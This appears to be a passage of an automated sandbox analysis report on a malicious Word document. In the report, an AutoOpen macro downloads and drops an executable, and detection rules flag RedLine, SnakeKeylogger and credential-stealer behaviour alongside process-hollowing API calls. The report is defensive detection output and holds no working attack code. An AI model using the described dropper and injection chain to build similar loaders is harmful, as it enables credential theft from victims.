          Source: 18.3.npratlsN.pif.1ea7e990.0.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
          Source: 14.2.npratlsN.pif.36830ee8.4.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
          Source: 00000008.00000001.1851558247.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects RedLine infostealer, Author: ditekSHen
          Source: 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
          Source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
          Source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
          Source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
          Source: 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
          Source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
          Source: 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: 00000008.00000002.3047680567.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects RedLine infostealer, Author: ditekSHen
          Source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
          Source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
          Source: 00000012.00000002.3047750977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects RedLine infostealer, Author: ditekSHen
          Source: 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: 00000012.00000001.2046118520.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects RedLine infostealer, Author: ditekSHen
          Source: 0000000E.00000001.1967244493.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects RedLine infostealer, Author: ditekSHen
          Source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
          Source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
          Source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
          Source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Detects executables with potential process hoocking, Author: ditekSHen
          Source: 0000000E.00000002.3047709158.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Detects RedLine infostealer, Author: ditekSHen
          Source: Process Memory Space: npratlsN.pif PID: 8112, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: Process Memory Space: npratlsN.pif PID: 3980, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: Process Memory Space: npratlsN.pif PID: 7692, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
          Source: PI ITS15235.doc, Stream path 'Macros/VBA/ThisDocument': found possibly 'ADODB.Stream' functions open, savetofile, write
          Source: VBA code instrumentation, OLE, VBA macro: Module ThisDocument, Function AutoOpen, found possibly 'ADODB.Stream' functions open, savetofile, write, Name: AutoOpen
          Source: PI ITS15235.doc, Stream path 'Macros/VBA/ThisDocument': found possibly 'XMLHttpRequest' functions response, responsebody, open, send
          Source: VBA code instrumentation, OLE, VBA macro: Module ThisDocument, Function AutoOpen, found possibly 'XMLHttpRequest' functions response, responsebody, open, send, Name: AutoOpen
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, File created: C:\Windows\SysWOW64\brightness.exe
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, COM Object queried: Server XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{AFBA6B42-5692-48EA-8141-DC517DCF0EF1}
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\InprocServer32
          Source: C:\Windows\SysWOW64\brightness.exe, Code function: 4_2_0291824C NtReadVirtualMemory,4_2_0291824C
          Source: C:\Windows\SysWOW64\brightness.exe, Code function: 4_2_029184BC NtUnmapViewOfSection,4_2_029184BC
          Source: C:\Windows\SysWOW64\brightness.exe, Code function: 4_2_02918BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,4_2_02918BA8
          Source: C:\Windows\SysWOW64\brightness.exe, Code function: 4_2_029179AC NtAllocateVirtualMemory,4_2_029179AC
          Source: C:\Windows\SysWOW64\brightness.exe, Code function: 4_2_0291DE78 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,4_2_0291DE78
          Source: C:\Windows\SysWOW64\brightness.exe, Code function: 4_2_0291DFE4 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,4_2_0291DFE4
          Source: C:\Windows\SysWOW64\brightness.exe, Code function: 4_2_0291DF00 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,4_2_0291DF00
          Source: C:\Windows\SysWOW64\brightness.exe, Code function: 4_2_02917CF8 NtWriteVirtualMemory,4_2_02917CF8
          Source: C:\Windows\SysWOW64\brightness.exe, Code function: 4_2_02918BA6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,4_2_02918BA6
          Source: C:\Windows\SysWOW64\brightness.exe, Code function: 4_2_029179AA NtAllocateVirtualMemory,4_2_029179AA
          Source: C:\Windows\SysWOW64\brightness.exe, Code function: 4_2_0291DE24 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,4_2_0291DE24
          Source: C:\Users\Public\Libraries\Nsltarpn.PIF, Code function: 11_2_027E824C NtReadVirtualMemory,11_2_027E824C
          Source: C:\Users\Public\Libraries\Nsltarpn.PIF, Code function: 11_2_027E84BC NtUnmapViewOfSection,11_2_027E84BC
          Source: C:\Users\Public\Libraries\Nsltarpn.PIF, Code function: 11_2_027E8BA8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,11_2_027E8BA8
          Source: C:\Users\Public\Libraries\Nsltarpn.PIF, Code function: 11_2_027E79AC NtAllocateVirtualMemory,11_2_027E79AC
          Source: C:\Users\Public\Libraries\Nsltarpn.PIF, Code function: 11_2_027EDE78 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,11_2_027EDE78
          Source: C:\Users\Public\Libraries\Nsltarpn.PIF, Code function: 11_2_027EDF00 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,11_2_027EDF00
          Source: C:\Users\Public\Libraries\Nsltarpn.PIF, Code function: 11_2_027EDFE4 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,11_2_027EDFE4
          Source: C:\Users\Public\Libraries\Nsltarpn.PIF, Code function: 11_2_027E7CF8 NtWriteVirtualMemory,11_2_027E7CF8
          Source: C:\Users\Public\Libraries\Nsltarpn.PIF, Code function: 11_2_027E8BA6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,11_2_027E8BA6
          Source: C:\Users\Public\Libraries\Nsltarpn.PIF, Code function: 11_2_027E79AA NtAllocateVirtualMemory,11_2_027E79AA
          Source: C:\Users\Public\Libraries\Nsltarpn.PIF, Code function: 11_2_027EDE24 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,11_2_027EDE24
          Source: C:\Windows\SysWOW64\brightness.exe, Code function: 4_2_0291F0A8 InetIsOffline,CoInitialize,CoUninitialize,Sleep,MoveFileA,MoveFileA,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,4_2_0291F0A8
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, File created: C:\Windows\SysWOW64\brightness.exe
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C90DA188_2_2C90DA18
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9097188_2_2C909718
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9059008_2_2C905900
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C90F2008_2_2C90F200
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9000078_2_2C900007
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9049088_2_2C904908
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9084088_2_2C908408
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C90AF0B8_2_2C90AF0B
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C90DA0B8_2_2C90DA0B
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C906C0F8_2_2C906C0F
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C90C2308_2_2C90C230
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C907F308_2_2C907F30
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9032328_2_2C903232
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C90ED338_2_2C90ED33
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9032388_2_2C903238
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C90ED388_2_2C90ED38
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9012388_2_2C901238
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C906C208_2_2C906C20
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9097288_2_2C909728
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9053288_2_2C905328
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C90C22B8_2_2C90C22B
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C90D5508_2_2C90D550
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C903B588_2_2C903B58
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9067588_2_2C906758
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C901B588_2_2C901B58
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C90925B8_2_2C90925B
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9000408_2_2C900040
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C907F408_2_2C907F40
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C90AA438_2_2C90AA43
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9012488_2_2C901248
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C90AA488_2_2C90AA48
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C903B488_2_2C903B48
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C90D5488_2_2C90D548
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C90674B8_2_2C90674B
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C90094F8_2_2C90094F
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C90E8708_2_2C90E870
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C90A5738_2_2C90A573
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9044788_2_2C904478
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C907A788_2_2C907A78
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C90247C8_2_2C90247C
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9009608_2_2C900960
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9092608_2_2C909260
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C90BD638_2_2C90BD63
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C901B688_2_2C901B68
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C90BD688_2_2C90BD68
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9044688_2_2C904468
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C90E86B8_2_2C90E86B
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C907A6F8_2_2C907A6F
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C940E988_2_2C940E98
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94ECD88_2_2C94ECD8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9476188_2_2C947618
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94EFF88_2_2C94EFF8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94E6988_2_2C94E698
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9482988_2_2C948298
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94B4988_2_2C94B498
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C940E878_2_2C940E87
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C949EB88_2_2C949EB8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94D0B88_2_2C94D0B8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9488D88_2_2C9488D8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94BAD88_2_2C94BAD8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94ECC88_2_2C94ECC8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94D6F88_2_2C94D6F8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94A4F88_2_2C94A4F8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9404FB8_2_2C9404FB
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94001C8_2_2C94001C
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94DA188_2_2C94DA18
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94A8188_2_2C94A818
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94F6388_2_2C94F638
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9492388_2_2C949238
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94C4388_2_2C94C438
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94E0588_2_2C94E058
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C947C588_2_2C947C58
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94AE588_2_2C94AE58
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9400408_2_2C940040
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94FC788_2_2C94FC78
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94CA788_2_2C94CA78
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9498788_2_2C949878
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94FC688_2_2C94FC68
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94CD988_2_2C94CD98
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C949B988_2_2C949B98
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9485B88_2_2C9485B8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94E9B88_2_2C94E9B8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94B7B88_2_2C94B7B8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9409D08_2_2C9409D0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94A1D88_2_2C94A1D8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94D3D88_2_2C94D3D8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9409C38_2_2C9409C3
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C948BF88_2_2C948BF8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94BDF88_2_2C94BDF8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94F3188_2_2C94F318
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94C1188_2_2C94C118
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C948F188_2_2C948F18
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9405088_2_2C940508
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94DD388_2_2C94DD38
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9479388_2_2C947938
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94AB388_2_2C94AB38
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94F9588_2_2C94F958
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9495588_2_2C949558
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94C7588_2_2C94C758
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94E3788_2_2C94E378
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C947F788_2_2C947F78
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C94B1788_2_2C94B178
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C95CA908_2_2C95CA90
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9564408_2_2C956440
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9538808_2_2C953880
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9506808_2_2C950680
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9554A08_2_2C9554A0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9522A08_2_2C9522A0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C953EC08_2_2C953EC0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C950CC08_2_2C950CC0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C955AE08_2_2C955AE0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9528E08_2_2C9528E0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C95F4188_2_2C95F418
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9500068_2_2C950006
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C952C008_2_2C952C00
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C955E008_2_2C955E00
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9548208_2_2C954820
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9516208_2_2C951620
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C95F4288_2_2C95F428
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9532408_2_2C953240
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9500408_2_2C950040
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C954E608_2_2C954E60
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C951C608_2_2C951C60
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9551808_2_2C955180
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C951F808_2_2C951F80
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C953BA08_2_2C953BA0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9509A08_2_2C9509A0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9557C08_2_2C9557C0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9525C08_2_2C9525C0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C95E1C88_2_2C95E1C8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9541E08_2_2C9541E0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C950FE08_2_2C950FE0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9545008_2_2C954500
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9513008_2_2C951300
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9561208_2_2C956120
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C952F208_2_2C952F20
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C954B408_2_2C954B40
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9519408_2_2C951940
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C95034F8_2_2C95034F
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9535608_2_2C953560
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9503608_2_2C950360
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C962DB08_2_2C962DB0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C960AB88_2_2C960AB8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9626B08_2_2C9626B0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9603B88_2_2C9603B8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C961FB08_2_2C961FB0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9618B08_2_2C9618B0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9636898_2_2C963689
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9651928_2_2C965192
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9611B08_2_2C9611B0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C962DA18_2_2C962DA1
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C960AA88_2_2C960AA8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9626A28_2_2C9626A2
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C96003B8_2_2C96003B
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9600408_2_2C960040
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9603A88_2_2C9603A8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C961FA18_2_2C961FA1
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9618A28_2_2C9618A2
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C9611A08_2_2C9611A0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2D02C0118_2_2D02C011
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2D02524B8_2_2D02524B
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2D0252588_2_2D025258
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2D0232AC8_2_2D0232AC
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_00408C608_1_00408C60
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_0040DC118_1_0040DC11
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_00407C3F8_1_00407C3F
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_00418CCC8_1_00418CCC
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_00406CA08_1_00406CA0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_004028B08_1_004028B0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_0041A4BE8_1_0041A4BE
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_00408C608_1_00408C60
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_004182448_1_00418244
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_004016508_1_00401650
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_00402F208_1_00402F20
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_004193C48_1_004193C4
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_004187888_1_00418788
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_00402F898_1_00402F89
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_00402B908_1_00402B90
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_004073A08_1_004073A0
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFCode function: 11_2_027D20C411_2_027D20C4
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_00408C6014_2_00408C60
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_0040DC1114_2_0040DC11
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_00407C3F14_2_00407C3F
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_00418CCC14_2_00418CCC
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_00406CA014_2_00406CA0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_004028B014_2_004028B0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_0041A4BE14_2_0041A4BE
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_00408C6014_2_00408C60
